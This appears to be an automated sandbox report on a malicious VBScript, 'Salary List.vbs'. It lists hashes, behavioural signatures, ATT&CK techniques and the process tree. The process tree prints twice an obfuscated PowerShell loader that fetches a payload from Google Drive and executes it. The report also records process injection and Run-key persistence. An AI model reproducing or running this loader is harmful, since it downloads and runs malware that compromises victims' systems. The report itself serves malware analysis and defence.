2d3f0a076b49f751528c53d30f696919853262551369afe4f3de82783826ef0e

General

Target

Salary List.vbs
Size

1.1MB
MD5

ca9412c90e44249a3856543a339ce5b7
SHA1

d2974eeff29da5f2d3339ad296406ade0e06b99e
SHA256

2d3f0a076b49f751528c53d30f696919853262551369afe4f3de82783826ef0e
SHA512

662b8b84aca399777e3c83d3ca8c0180b614ef195e2992247ee045ff1cd7adfbfd3bae6964ef98b00ac73c469930f588e7a0e7e198fb2cda76d9fee86202080d
SSDEEP

12288:x31cvBzbU01qal638iNX3iTMgmuYtWN/ZgMiQPeRj9:xYz64+2Sj9

Score

8^/10

persistence

Malware Config

Signatures

Adds policy Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\Registry\User\S-1-5-21-3691908287-3775019229-3534252667-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	colorcpl.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	1232	powershell.exe
5	1232	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\P8APG = "C:\\Program Files (x86)\\windows mail\\wab.exe"	colorcpl.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
8	drive.google.com
2	drive.google.com
3	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2040	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2052	powershell.exe
2040	wab.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2052 set thread context of 2040	2052	powershell.exe	34
PID 2040 set thread context of 1200	2040	wab.exe	21
PID 2040 set thread context of 2612	2040	wab.exe	39
PID 2612 set thread context of 1200	2612	colorcpl.exe	21

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
1232	powershell.exe
2052	powershell.exe
2052	powershell.exe
2040	wab.exe
2040	wab.exe
2040	wab.exe
2040	wab.exe
2040	wab.exe
2040	wab.exe
2040	wab.exe
2040	wab.exe
2612	colorcpl.exe
2612	colorcpl.exe
2612	colorcpl.exe
2612	colorcpl.exe
2612	colorcpl.exe
2612	colorcpl.exe
2612	colorcpl.exe
2612	colorcpl.exe
2612	colorcpl.exe
2612	colorcpl.exe
2612	colorcpl.exe
2612	colorcpl.exe
2612	colorcpl.exe
2612	colorcpl.exe
2612	colorcpl.exe

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
2052	powershell.exe
2040	wab.exe
1200	Explorer.EXE
1200	Explorer.EXE
2612	colorcpl.exe
2612	colorcpl.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1232	powershell.exe
Token: SeDebugPrivilege	2052	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2916 wrote to memory of 1232	2916	WScript.exe	28
PID 2916 wrote to memory of 1232	2916	WScript.exe	28
PID 2916 wrote to memory of 1232	2916	WScript.exe	28
PID 1232 wrote to memory of 1324	1232	powershell.exe	30
PID 1232 wrote to memory of 1324	1232	powershell.exe	30
PID 1232 wrote to memory of 1324	1232	powershell.exe	30
PID 1232 wrote to memory of 2052	1232	powershell.exe	32
PID 1232 wrote to memory of 2052	1232	powershell.exe	32
PID 1232 wrote to memory of 2052	1232	powershell.exe	32
PID 1232 wrote to memory of 2052	1232	powershell.exe	32
PID 2052 wrote to memory of 1732	2052	powershell.exe	33
PID 2052 wrote to memory of 1732	2052	powershell.exe	33
PID 2052 wrote to memory of 1732	2052	powershell.exe	33
PID 2052 wrote to memory of 1732	2052	powershell.exe	33
PID 2052 wrote to memory of 2040	2052	powershell.exe	34
PID 2052 wrote to memory of 2040	2052	powershell.exe	34
PID 2052 wrote to memory of 2040	2052	powershell.exe	34
PID 2052 wrote to memory of 2040	2052	powershell.exe	34
PID 2052 wrote to memory of 2040	2052	powershell.exe	34
PID 2052 wrote to memory of 2040	2052	powershell.exe	34
PID 1200 wrote to memory of 2612	1200	Explorer.EXE	39
PID 1200 wrote to memory of 2612	1200	Explorer.EXE	39
PID 1200 wrote to memory of 2612	1200	Explorer.EXE	39
PID 1200 wrote to memory of 2612	1200	Explorer.EXE	39

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1200
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Salary List.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2916
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Planariform247 = 1;Function Rabbitwise($Tie85){$Glandiform231=$Tie85.Length-$Planariform247;$Tapetopstterens='Substring';For( $Misantroper=7;$Misantroper -lt $Glandiform231;$Misantroper+=8){$Overdramatizes69+=$Tie85.$Tapetopstterens.Invoke( $Misantroper, $Planariform247);}$Overdramatizes69;}function Territorier($Lacunar){ . ($Duce) ($Lacunar);}$quinonoid=Rabbitwise 'CuprotuMOxyphe oSubmilizSkrubniiSangkorlPar.eril MilieuaDetailr/Resurge5 nderpr. Voteri0Ildelug Eftersp( SolmisWNe triaiDi.ektrnBeskrmedRve,kuloSundhedw Preceps Godl.e spirerNQuickerTSemipun Remerg1Monosta0Teknolo.mood,rd0 Horsej;E,punge Fi fighWsawmilli Busse.nTitlern6Saluter4Tastatu;Geoform .astroexpatr,lj6Enhe sp4Aflaase; Modelf EnolizrJournalvLettroe:Gingerl1 ,itrob2 W,odsp1Cirkule.Acetoba0 Chk,li)Genlser Kamp gnGHesyc,aeEksploscstrafbekVanddamo Aalekr/Triumph2Antipod0Skrump.1brosten0.andman0Jimmiud1Rhomboh0.trigae1Fremdra ArbejdFFadeburi HelederP,rsonkeUnderfafSammensoKoloniaxMerchan/ bivua 1.irsdag2.mplice1indemon..ebarke0Syma.ki ';$Inkluder=Rabbitwise 'Rheom rUNettlebsSpasmateLoom nur Modt g- TruantAJoltersgUnsp sseAutocarn RegnestDrmmebi ';$Criminalist=Rabbitwise 'KnopsvahBundlettFat iestTrichopp FinialsOverma,:Undrewu/ Birefr/ m.lvoid .ruldsr,ndkomsiKrigsskvDansepaeloverin.Del.gergFeins hoFireaaroHa genfg Kobl.nlSvaner eStar ti.Dial,zacInspectoCabochomjapa,iz/A menejuR strikcByplans? Prefl.e SubrutxPanoch.pFemtedeoNo,accorBelastntMedhold=AutofundSfrebloohistoriwGaslednnShunterlWhiteouo Pai seaCocktaidBenklde&An,ennaiFisk,ridCirkel.=Thincla1Snowfal2analyseGSemimemXCreamlat D,ltidNS emples OutstuQStats.asPubo,ibj Coth,ro Fin,erK Wa,lydn ngsesrEGi ntliQSkrmselERobustfT Kont.kkHaandklvobtundeKBurrern1Fre,medALag rar9Undered9 ViderefAnklageN RekissiFritzan-Eug,niceCakyklesAf elin6Udpib,niMja.etsRBe,abst ';$Trucken=Rabbitwise 'Datemar>redu da ';$Duce=Rabbitwise 'Eger.nviA.etysteFor.atsxF dteri ';$slidfladers='Pianoer';$hjalp = Rabbitwise 'Statikee .drehjcIdentifhannoyanoOmni or Siddem%.aiticdaNonpartpsky,jtupNuz,lesdCrescivaTemporotGarboilaManipul%S.kkerl\hemikarHEl ctroeBasiotrbsvovlinr,renchpeDannebrw Gumm,giAmusedlsFalsifimUnv.lum.GasrrleRSp,rtaneMinenbavBuryboo Ligbrnd& Stangv&Omplace RejseweF.ithsocTrykkeahBalsa eoIntegra Udgi ttMantswi ';Territorier (Rabbitwise ' Hydron$ein,rfyg AfsnaplAsparagoSunroofbO.erpioaTilstedlTrisbak:ProtestFKiggetsrCordmaki LeukoctChloropi Wesleyd AfstivshydrazicPluviale blyindnOvercaptAjabakerKontroleAmazonitGoingshsSiegfri= Kildes(St sendcHord.inmDemonstdAmher t Knobble/ Punis cTussock Superf$Screwwoh Mervrdj FolderaUdmundilDetermipAnfrels)Polypho ');Territorier (Rabbitwise 'efforce$L,esning crenellGeocronoC.unterbM sonwoa ektionl bscura:RikocheSSklmerotFenolsjrDi.robekPos tivb ortbraLuciditnChromogdsan.koraDialogugGallicaeNoejesurSelvudf=Sofapud$MedbrinCSprin.erLombrosiVare olmP otogliHjemmeonDangi.gaHollow lReevokeiUngl,insForraadtB.ewayg.Securers bismutpMeefanglOrtopd,iEmaljegtMulleyo( hinily$ nexperTUnripekrUdko,mauSkr,khncMysophikitchproeTertiarn homi.i)Hoderba ');$Criminalist=$Strkbandager[0];$Uvenliges= (Rabbitwise 'Photoco$DisposigUnclasplM onsoroCryptocbEmpididaPacifislAdmi is:B,ttefeBThorl.kl UnsacruTweezinmBanglad=InfestiNFixupspe pr.graw,ubinte-Spar,acODkkeskab TavestjSaut,rneFlexibic LandkrtParo.ex Omkos,nSBematafySkedekas FgteretTostaveeSdeevnemBaserin.Paa indNHedysbaePrior tt tilli..SunspotWUnacquieProfitab ChickhCSpg,avelSwingeniAmygdopefumadomnResto.it');$Uvenliges+=$Fritidscentrets[1];Territorier ($Uvenliges);Territorier (Rabbitwise 'Merc.ss$ runchBSa,dfanlUnflickuSeancenmUtilbj .ProkuraHK.onotoePulveriaPaals idBillione RoklubrP ysicosGadenav[ Tex.il$ProtanoIWordlienSumpgaskBevismil SpidsluIndigosdS,prabreHaglskarDisturb]aabenpl=Technol$TrivialqReceptiuPatentiiIntercen,uwaitsoPolychrnReformsodena uriAutoly dAdjourn ');$Letsindighedens=Rabbitwise 'K.bukre$kursusoBLenitivlDo beltuUndeclim Pusler.ForfrdeDA.sigteoSupercowGenitivnForeknelFngslino RygsksaWhereandOpri.deFCardinaiKagernelStartope Skbner(fidoafg$ GaflenCApparitrPatterniKobbernmInsuffiiN xalfonSkrd.era Krop alSupersoiDybdepssDe.thlitDerived, Aarema$MispurcL Uncir,oundaw.euDvrg.iglWastefuuCebinep)Foz,est ';$Loulu=$Fritidscentrets[0];Territorier (Rabbitwise 'Margr.v$Efferv,gjimplydlJerrieioLtapperb PizzaraProtokol Apinag:KolkozyUtrevejsnTotalbeb,vejsbar proceneJarn,ssaWaiseovkSaetninaOmringabFlo rkei SvuppelTimew.riAnsti.ttbvreedsyHjemmea3Zancli.6Cook es= Leucoc(DobbeltTGainliee,aveskksSkiagrat Smu.te-SelvbudPA semblaDat.erktSpidssnhChoelus Urgentn$ .llekrLPen,ncio ChehaluPhotothlSmuggleuT dlnsf) Udbred ');while (!$Unbreakability36) {Territorier (Rabbitwise 'Bagwom $Eksportg billetl taatsroAkkord,b Emb.staFarthinlFormabl: PenetrIArter,an CompilgSmrokkerInte,paephacolyv Over eepassaic=,arboar$Kivcosot Slavonrfr,gtesuSummerieFamilia ') ;Territorier $Letsindighedens;Territorier (Rabbitwise 'AnflyveSBaands.tBonelliaWestmarrHesperot,rtspil-decemviS Tidsp,lUdslette larerieStimulapRd,bene Eyolfro4Loading ');Territorier (Rabbitwise ' rbanit$ Musk tgJvningelSelloutoRotatiobFluviotaUnloathlOlofsso:Ug.nertUReservenGlobi,cbRelatior Phyto.eBroslagaKulegrak vuggenaYulan dbBeregneimelanoclFulmen.i,hromoptDipter,ySkifter3Choroid6bland.t=Pyjamas( afdeliTusigtbaeYahwists macrlitRecipie-Gu.tersPHemitr,aB.nzenetMicrohyhPhocian homewo$ ArrigtLMater aoCholedouExegetilDalboeru Kli.at)Divaric ') ;Territorier (Rabbitwise 'Jessgas$Saks.bigTornblalTartarioProd.ctbBiog.afaFunktiolHarmoni:H,berniBthalassojustervgLg ehislValvotoaInstrumdKnusereeOliebilrDrengessS.annin= Rentei$ Hundy,gGalssidlAfst vnoPagoda.b,araplyaHorripilF.leter:GraehmeLK,lvesteNote,adfrina,dot AscertiResu.sesPurpr,sm,nfinit+ aftmer+Sundere%Avissal$Cli,ginSRecremetSakiehtr U,pindkEnsp debBiblerdaStraffen unre odWrootdaaPort,aygUstilage Konfigr Lemuri. Annebec EkspedoAntiariuA,senetnNejs getWhences ') ;$Criminalist=$Strkbandager[$Bogladers];}$Brnelrdommene=330812;$Trubaduren118=30840;Territorier (Rabbitwise ' Dimeth$ ScapeggTibetanlButtstroAmas abbCrivetza Ubedralemfort.: Tilsidd Gla,rouPreneurnDy fryscMelod,ai AdeptscAfpressaAshamnulSmaalig Skru st= Iraund StreitgGHindrine S mulatIncages-Pop,liuCAuktionoParvitun An logt Ot,gype Po,ulanVlmindetCharlat Forbrug$NusseriLEr ctatoHibachiuObjek.el CamboduImmatri ');Territorier (Rabbitwise 'Apana i$AmidoacgFormanulFicche.o pdaterbDismastaMultivalAnti on:Hor,efiLVandhanoBronchot,nurredtSpeedeniEs,adreeConfabus Antici Snertho=Rocksha Coude.f[ RenvasSSubobtuyAnstrensPasq iltKabelbre Assoilm Warn o.Vlge.mdCSt,akssoZ.psutrnFiancaivpentecoeProgr.mrV,nylent Skrevn] Rmmesu:Terva.e:LysledeFS,oldefrBipartioMitrastm,rocentB Overina Tensi,sIndefateFett,rl6Prefixh4 MorninSOprejsntCharlatr Femogti Pt,ticnLede.ingToastma( R smin$,amiscidAnomal,uActaeacnStitr,tc underbiphilocacDisposiaSlutstelAmblyop)Kontrak ');Territorier (Rabbitwise ' arooku$chromatg smrtyvlAl erslo R,cklabDrjdefiaYouthe,lStu tme:Men ionWCon,entoConvolveRegionahSydvestl UnderseKaskaderundersliVignetttForuroleSentime kaution=Tid.bns Kohrent[Hag.datSChenettyForstudsRowdilytNonatm eopulastma,freds.FjernstTSpeditieClownsax hoorootVisual .FejlhypERegistenMiljbescR pnderoPhon medPadrepai ,nivern ethnicg Stomod]Obl via: unsmir:Sei,nioA,raggieSRegistrCYamacraIGam,togIinder.a.UnderviG Plo teeParceletSyndicaSbecorestoidiamar AfskriiSic atinnewsmang Mennes( St fti$grundveLMixerchoLdreraatBoglisttMulighei Traum,e VerdursUmulig.)Svinghj ');Territorier (Rabbitwise 'Telefon$ UndtaggPaynimhlLu ritooEphydrabPant,rea UnaliglScrunch:PiesequDTekstste Rh.nosnAutos.rtUsurpataVaginovlDavitcrlSkolastaPanik rb UntragoNonadjurPeer ssaTra.sfutKontaktoUfornufrAntipo.i OptaktuShieldimArangor6Combine8Pol,eni=Et erea$Se erraWRid,elioSvire.deNetstrohGlutto,l omerileHaar,prrIn irmiiSaalegntInterteeAnnlils.AppoggisChloropuHippo,ob OldingsB andaltBjerg.arTungsini,lippesn Alfab gPatriot( ffletb$UndisfrBBadetsmrHypnestnWainwrie ProtoblChammrdr Avow.ydFlincheoNo sancm Bordinm SidebueSpir rbnSmandsseSrbehan,perspic$Ha.moniTHindbrrrFilmdomuReservabSumenavaScurviedOnce,pluDigterirTr.nseneContempn Conver1 Campma1 Ichthy8 Tescha)Telamon ');Territorier $Dentallaboratorium68;"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1232
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Hebrewism.Rev && echo t"
      4⤵
      PID:1324
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Planariform247 = 1;Function Rabbitwise($Tie85){$Glandiform231=$Tie85.Length-$Planariform247;$Tapetopstterens='Substring';For( $Misantroper=7;$Misantroper -lt $Glandiform231;$Misantroper+=8){$Overdramatizes69+=$Tie85.$Tapetopstterens.Invoke( $Misantroper, $Planariform247);}$Overdramatizes69;}function Territorier($Lacunar){ . ($Duce) ($Lacunar);}$quinonoid=Rabbitwise 'CuprotuMOxyphe oSubmilizSkrubniiSangkorlPar.eril MilieuaDetailr/Resurge5 nderpr. Voteri0Ildelug Eftersp( SolmisWNe triaiDi.ektrnBeskrmedRve,kuloSundhedw Preceps Godl.e spirerNQuickerTSemipun Remerg1Monosta0Teknolo.mood,rd0 Horsej;E,punge Fi fighWsawmilli Busse.nTitlern6Saluter4Tastatu;Geoform .astroexpatr,lj6Enhe sp4Aflaase; Modelf EnolizrJournalvLettroe:Gingerl1 ,itrob2 W,odsp1Cirkule.Acetoba0 Chk,li)Genlser Kamp gnGHesyc,aeEksploscstrafbekVanddamo Aalekr/Triumph2Antipod0Skrump.1brosten0.andman0Jimmiud1Rhomboh0.trigae1Fremdra ArbejdFFadeburi HelederP,rsonkeUnderfafSammensoKoloniaxMerchan/ bivua 1.irsdag2.mplice1indemon..ebarke0Syma.ki ';$Inkluder=Rabbitwise 'Rheom rUNettlebsSpasmateLoom nur Modt g- TruantAJoltersgUnsp sseAutocarn RegnestDrmmebi ';$Criminalist=Rabbitwise 'KnopsvahBundlettFat iestTrichopp FinialsOverma,:Undrewu/ Birefr/ m.lvoid .ruldsr,ndkomsiKrigsskvDansepaeloverin.Del.gergFeins hoFireaaroHa genfg Kobl.nlSvaner eStar ti.Dial,zacInspectoCabochomjapa,iz/A menejuR strikcByplans? Prefl.e SubrutxPanoch.pFemtedeoNo,accorBelastntMedhold=AutofundSfrebloohistoriwGaslednnShunterlWhiteouo Pai seaCocktaidBenklde&An,ennaiFisk,ridCirkel.=Thincla1Snowfal2analyseGSemimemXCreamlat D,ltidNS emples OutstuQStats.asPubo,ibj Coth,ro Fin,erK Wa,lydn ngsesrEGi ntliQSkrmselERobustfT Kont.kkHaandklvobtundeKBurrern1Fre,medALag rar9Undered9 ViderefAnklageN RekissiFritzan-Eug,niceCakyklesAf elin6Udpib,niMja.etsRBe,abst ';$Trucken=Rabbitwise 'Datemar>redu da ';$Duce=Rabbitwise 'Eger.nviA.etysteFor.atsxF dteri ';$slidfladers='Pianoer';$hjalp = Rabbitwise 'Statikee .drehjcIdentifhannoyanoOmni or Siddem%.aiticdaNonpartpsky,jtupNuz,lesdCrescivaTemporotGarboilaManipul%S.kkerl\hemikarHEl ctroeBasiotrbsvovlinr,renchpeDannebrw Gumm,giAmusedlsFalsifimUnv.lum.GasrrleRSp,rtaneMinenbavBuryboo Ligbrnd& Stangv&Omplace RejseweF.ithsocTrykkeahBalsa eoIntegra Udgi ttMantswi ';Territorier (Rabbitwise ' Hydron$ein,rfyg AfsnaplAsparagoSunroofbO.erpioaTilstedlTrisbak:ProtestFKiggetsrCordmaki LeukoctChloropi Wesleyd AfstivshydrazicPluviale blyindnOvercaptAjabakerKontroleAmazonitGoingshsSiegfri= Kildes(St sendcHord.inmDemonstdAmher t Knobble/ Punis cTussock Superf$Screwwoh Mervrdj FolderaUdmundilDetermipAnfrels)Polypho ');Territorier (Rabbitwise 'efforce$L,esning crenellGeocronoC.unterbM sonwoa ektionl bscura:RikocheSSklmerotFenolsjrDi.robekPos tivb ortbraLuciditnChromogdsan.koraDialogugGallicaeNoejesurSelvudf=Sofapud$MedbrinCSprin.erLombrosiVare olmP otogliHjemmeonDangi.gaHollow lReevokeiUngl,insForraadtB.ewayg.Securers bismutpMeefanglOrtopd,iEmaljegtMulleyo( hinily$ nexperTUnripekrUdko,mauSkr,khncMysophikitchproeTertiarn homi.i)Hoderba ');$Criminalist=$Strkbandager[0];$Uvenliges= (Rabbitwise 'Photoco$DisposigUnclasplM onsoroCryptocbEmpididaPacifislAdmi is:B,ttefeBThorl.kl UnsacruTweezinmBanglad=InfestiNFixupspe pr.graw,ubinte-Spar,acODkkeskab TavestjSaut,rneFlexibic LandkrtParo.ex Omkos,nSBematafySkedekas FgteretTostaveeSdeevnemBaserin.Paa indNHedysbaePrior tt tilli..SunspotWUnacquieProfitab ChickhCSpg,avelSwingeniAmygdopefumadomnResto.it');$Uvenliges+=$Fritidscentrets[1];Territorier ($Uvenliges);Territorier (Rabbitwise 'Merc.ss$ runchBSa,dfanlUnflickuSeancenmUtilbj .ProkuraHK.onotoePulveriaPaals idBillione RoklubrP ysicosGadenav[ Tex.il$ProtanoIWordlienSumpgaskBevismil SpidsluIndigosdS,prabreHaglskarDisturb]aabenpl=Technol$TrivialqReceptiuPatentiiIntercen,uwaitsoPolychrnReformsodena uriAutoly dAdjourn ');$Letsindighedens=Rabbitwise 'K.bukre$kursusoBLenitivlDo beltuUndeclim Pusler.ForfrdeDA.sigteoSupercowGenitivnForeknelFngslino RygsksaWhereandOpri.deFCardinaiKagernelStartope Skbner(fidoafg$ GaflenCApparitrPatterniKobbernmInsuffiiN xalfonSkrd.era Krop alSupersoiDybdepssDe.thlitDerived, Aarema$MispurcL Uncir,oundaw.euDvrg.iglWastefuuCebinep)Foz,est ';$Loulu=$Fritidscentrets[0];Territorier (Rabbitwise 'Margr.v$Efferv,gjimplydlJerrieioLtapperb PizzaraProtokol Apinag:KolkozyUtrevejsnTotalbeb,vejsbar proceneJarn,ssaWaiseovkSaetninaOmringabFlo rkei SvuppelTimew.riAnsti.ttbvreedsyHjemmea3Zancli.6Cook es= Leucoc(DobbeltTGainliee,aveskksSkiagrat Smu.te-SelvbudPA semblaDat.erktSpidssnhChoelus Urgentn$ .llekrLPen,ncio ChehaluPhotothlSmuggleuT dlnsf) Udbred ');while (!$Unbreakability36) {Territorier (Rabbitwise 'Bagwom $Eksportg billetl taatsroAkkord,b Emb.staFarthinlFormabl: PenetrIArter,an CompilgSmrokkerInte,paephacolyv Over eepassaic=,arboar$Kivcosot Slavonrfr,gtesuSummerieFamilia ') ;Territorier $Letsindighedens;Territorier (Rabbitwise 'AnflyveSBaands.tBonelliaWestmarrHesperot,rtspil-decemviS Tidsp,lUdslette larerieStimulapRd,bene Eyolfro4Loading ');Territorier (Rabbitwise ' rbanit$ Musk tgJvningelSelloutoRotatiobFluviotaUnloathlOlofsso:Ug.nertUReservenGlobi,cbRelatior Phyto.eBroslagaKulegrak vuggenaYulan dbBeregneimelanoclFulmen.i,hromoptDipter,ySkifter3Choroid6bland.t=Pyjamas( afdeliTusigtbaeYahwists macrlitRecipie-Gu.tersPHemitr,aB.nzenetMicrohyhPhocian homewo$ ArrigtLMater aoCholedouExegetilDalboeru Kli.at)Divaric ') ;Territorier (Rabbitwise 'Jessgas$Saks.bigTornblalTartarioProd.ctbBiog.afaFunktiolHarmoni:H,berniBthalassojustervgLg ehislValvotoaInstrumdKnusereeOliebilrDrengessS.annin= Rentei$ Hundy,gGalssidlAfst vnoPagoda.b,araplyaHorripilF.leter:GraehmeLK,lvesteNote,adfrina,dot AscertiResu.sesPurpr,sm,nfinit+ aftmer+Sundere%Avissal$Cli,ginSRecremetSakiehtr U,pindkEnsp debBiblerdaStraffen unre odWrootdaaPort,aygUstilage Konfigr Lemuri. Annebec EkspedoAntiariuA,senetnNejs getWhences ') ;$Criminalist=$Strkbandager[$Bogladers];}$Brnelrdommene=330812;$Trubaduren118=30840;Territorier (Rabbitwise ' Dimeth$ ScapeggTibetanlButtstroAmas abbCrivetza Ubedralemfort.: Tilsidd Gla,rouPreneurnDy fryscMelod,ai AdeptscAfpressaAshamnulSmaalig Skru st= Iraund StreitgGHindrine S mulatIncages-Pop,liuCAuktionoParvitun An logt Ot,gype Po,ulanVlmindetCharlat Forbrug$NusseriLEr ctatoHibachiuObjek.el CamboduImmatri ');Territorier (Rabbitwise 'Apana i$AmidoacgFormanulFicche.o pdaterbDismastaMultivalAnti on:Hor,efiLVandhanoBronchot,nurredtSpeedeniEs,adreeConfabus Antici Snertho=Rocksha Coude.f[ RenvasSSubobtuyAnstrensPasq iltKabelbre Assoilm Warn o.Vlge.mdCSt,akssoZ.psutrnFiancaivpentecoeProgr.mrV,nylent Skrevn] Rmmesu:Terva.e:LysledeFS,oldefrBipartioMitrastm,rocentB Overina Tensi,sIndefateFett,rl6Prefixh4 MorninSOprejsntCharlatr Femogti Pt,ticnLede.ingToastma( R smin$,amiscidAnomal,uActaeacnStitr,tc underbiphilocacDisposiaSlutstelAmblyop)Kontrak ');Territorier (Rabbitwise ' arooku$chromatg smrtyvlAl erslo R,cklabDrjdefiaYouthe,lStu tme:Men ionWCon,entoConvolveRegionahSydvestl UnderseKaskaderundersliVignetttForuroleSentime kaution=Tid.bns Kohrent[Hag.datSChenettyForstudsRowdilytNonatm eopulastma,freds.FjernstTSpeditieClownsax hoorootVisual .FejlhypERegistenMiljbescR pnderoPhon medPadrepai ,nivern ethnicg Stomod]Obl via: unsmir:Sei,nioA,raggieSRegistrCYamacraIGam,togIinder.a.UnderviG Plo teeParceletSyndicaSbecorestoidiamar AfskriiSic atinnewsmang Mennes( St fti$grundveLMixerchoLdreraatBoglisttMulighei Traum,e VerdursUmulig.)Svinghj ');Territorier (Rabbitwise 'Telefon$ UndtaggPaynimhlLu ritooEphydrabPant,rea UnaliglScrunch:PiesequDTekstste Rh.nosnAutos.rtUsurpataVaginovlDavitcrlSkolastaPanik rb UntragoNonadjurPeer ssaTra.sfutKontaktoUfornufrAntipo.i OptaktuShieldimArangor6Combine8Pol,eni=Et erea$Se erraWRid,elioSvire.deNetstrohGlutto,l omerileHaar,prrIn irmiiSaalegntInterteeAnnlils.AppoggisChloropuHippo,ob OldingsB andaltBjerg.arTungsini,lippesn Alfab gPatriot( ffletb$UndisfrBBadetsmrHypnestnWainwrie ProtoblChammrdr Avow.ydFlincheoNo sancm Bordinm SidebueSpir rbnSmandsseSrbehan,perspic$Ha.moniTHindbrrrFilmdomuReservabSumenavaScurviedOnce,pluDigterirTr.nseneContempn Conver1 Campma1 Ichthy8 Tescha)Telamon ');Territorier $Dentallaboratorium68;"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2052
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Hebrewism.Rev && echo t"
        5⤵
        
        PID:1732
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:2040
- C:\Windows\SysWOW64\colorcpl.exe
  "C:\Windows\SysWOW64\colorcpl.exe"
  2⤵
  - Adds policy Run key to start application
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:2612

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

2

T1547

Registry Run Keys / Startup Folder

2

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

2

T1547

Registry Run Keys / Startup Folder

2

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Trostera.txt

Filesize
3KB

MD5
4689fb1513fc428d2947a3e4c08595e8

SHA1
965041f8d21258fab8cd7263c5458c63229997be

SHA256
aa608ccc69254becc2a9f7d5452ad71cf313f885f7855f9de3f45826087b92b6

SHA512
870d15a7227f3be019fbf4c8a0a1c2eb58ea738b4705766b6b8f84bf2ca45b5fa6373e6041194f45599fcb4912c5869d2ccdebf5729e9dbc9532734087cfa2b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Trostera.txt

Filesize
4KB

MD5
ce6c93b77fa33ed89e52cd7c1be34cb3

SHA1
d11355bc8ad1f7d944b497e9157468e212a47df2

SHA256
d56ca1a2bc37a36aa7a4f97f28dd89275931829a1f5d357101693f15d72ac7c9

SHA512
9bb7d5f9992f500f0a64243f9a54c86d27f5a804f3f62c2081f11d4d6c157492b37e55d9f05a6f1edd5d398aaae836c4bfc6e19d3c7c31306af6640e6e4d2f35

Download Submit
C:\Users\Admin\AppData\Local\Temp\Trostera.txt

Filesize
870B

MD5
74d7579dc0d339b5858a78caf911584e

SHA1
831a0602aa8798649c17ccf4d14ad7f9acb38d74

SHA256
d89a7bc7a541bf29624f142a1407800400319baa23d0c041c5a25fb0443f9dec

SHA512
7923535829658ee15770be62fdb3775e8eb891fa6822e873997bd9acad6cb1756aa41f9d09784c4ee740e37ac0238f9ad877573b00a5508fc7687117c3124c01

Download Submit
C:\Users\Admin\AppData\Roaming\Hebrewism.Rev

Filesize
470KB

MD5
08f3bfca0a1e1e880ca53b95e7d3e518

SHA1
5154537bf9665e8c84dcb2eca3166968a56071f0

SHA256
8ffd191d8ba4f697c8419f2a1a0f82f2fe1e9b11aabc03fae5672006498fbea0

SHA512
ff18041525b2697b66da5093c938305e0891a3ba26995e762e006a9a5a927ff97a2a64ed7263a8b8ee67fc7e8e9736a4e6936bdc649655b49dae1486a23ee3d5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6Z46EE3V7DV3M97WH2QK.temp

Filesize
7KB

MD5
5b2f62f946ce1a081a56489919283bcc

SHA1
0602b69ed2eafbdad921ea07dc9c3f71d9ed3870

SHA256
